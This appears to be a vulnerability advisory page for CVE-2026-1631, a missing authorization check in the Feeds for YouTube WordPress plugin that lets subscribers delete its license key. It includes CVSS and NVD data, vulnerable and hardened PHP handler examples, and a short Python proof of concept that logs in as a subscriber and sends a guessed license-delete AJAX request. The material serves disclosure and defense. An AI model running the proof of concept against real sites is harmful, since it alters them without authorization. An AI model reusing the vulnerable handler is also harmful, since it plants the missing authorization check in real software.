Security Vulnerability Report
CVE-2026-1631 CVSS 5.4 MEDIUM

CVE-2026-1631

Published: 2026-05-18 07:16:12
Last Modified: 2026-05-18 17:05:46

Description

The Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4 is vulnerable to unauthorized modification of its license key due to a missing capability check on the 'actions' function. This makes it possible for users with the Subscriber role and above to delete the license key. The record classifies the weakness as CWE-862 (missing authorization).
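
The following is an added illustration and is not code from the Feeds for YouTube plugin: a minimal WordPress AJAX handler in the shape the description implies (a license-key "delete" action reachable by any logged-in user), placed beside a hardened version that adds the capability check the record says was missing, plus a nonce check. The hook name, option name and nonce action (`example_plugin_actions`, `example_plugin_license_key`, `example_plugin_license_nonce`) are hypothetical placeholders; the WordPress functions used (`current_user_can`, `check_ajax_referer`, `delete_option`, `wp_send_json_*`) are real core APIs.

```php
<?php
// Added example, not the plugin's own code. Names marked hypothetical are placeholders.

// --- Vulnerable shape (CWE-862): any authenticated user can reach this. ---
// wp_ajax_* hooks fire for every logged-in user, so a Subscriber session is enough
// to call the handler; nothing below verifies that the caller may manage the plugin.
function example_plugin_actions_vulnerable() {
    $license_action = isset( $_POST['license_action'] ) ? sanitize_key( $_POST['license_action'] ) : '';
    if ( 'delete' === $license_action ) {
        delete_option( 'example_plugin_license_key' ); // hypothetical option name
        wp_send_json_success( 'license key deleted' );
    }
    wp_send_json_error( 'unknown action', 400 );
}

// --- Hardened shape: authorization and CSRF checks before any state change. ---
function example_plugin_actions_hardened() {
    // 1. Authorization: only users allowed to manage site options may proceed.
    //    This is the capability check whose absence the advisory describes.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF protection: the request must carry a valid nonce for this action
    //    (hypothetical nonce action name). check_ajax_referer() terminates on failure.
    check_ajax_referer( 'example_plugin_license_nonce', 'nonce' );

    $license_action = isset( $_POST['license_action'] ) ? sanitize_key( $_POST['license_action'] ) : '';
    if ( 'delete' === $license_action ) {
        delete_option( 'example_plugin_license_key' ); // hypothetical option name
        wp_send_json_success( 'license key deleted' );
    }
    wp_send_json_error( 'unknown action', 400 );
}

// Register only the hardened handler; the vulnerable one is kept for contrast.
add_action( 'wp_ajax_example_plugin_actions', 'example_plugin_actions_hardened' );
```

From a defender's side, the relevant signal in web server or WordPress logs is a POST to `wp-admin/admin-ajax.php` carrying a plugin-specific `action` value from a low-privilege session; the remediation is the capability check above, which vendor version 2.6.4 is stated to add.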

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Feeds for YouTube < 2.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
import requests

# Exploit Title: Feeds for YouTube < 2.6.4 - Subscriber+ License Key Deletion
# CVE: CVE-2026-1631

# Configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
username = "attacker"  # Low-privileged user (Subscriber)
password = "password"

# Initialize session
session = requests.Session()

# Step 1: Authenticate as a subscriber
login_url = target_url.replace('admin-ajax.php', 'wp-login.php')
login_data = {
    'log': username,
    'pwd': password,
    'redirect_to': 'http://example.com/wp-admin/',
    'wp-submit': 'Log In',
    'testcookie': '1'
}
session.post(login_url, data=login_data)

# Step 2: Exploit the vulnerability in 'actions' function
# The specific action name depends on the plugin's actual AJAX hook registration.
# This PoC simulates the request structure that triggers the vulnerability.
exploit_data = {
    'action': 'sby_actions',    # Hypothetical action name triggering the vulnerable function
    'license_action': 'delete'  # Parameter intended to delete the license key
}
response = session.post(target_url, data=exploit_data)

if response.status_code == 200:
    print("[+] Request sent successfully. License key may have been deleted.")
    print("[+] Response:", response.text)
else:
    print("[-] Exploit failed.")
```

References

https://wpscan.com/vulnerability/b19596c2-69bc-4e15-8632-eb80f4577e3c/ (WPScan advisory, as listed in the record's references)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-1631",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-18T07:16:12.020",
    "lastModified": "2026-05-18T17:05:46.240",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4 is vulnerable to unauthorized modification of the Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4's license key due to a missing capability check on the 'actions' function. This makes it possible for subscribers and above delete the license key."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/b19596c2-69bc-4e15-8632-eb80f4577e3c/",
        "source": "[email protected]"
      }
    ]
  }
}
```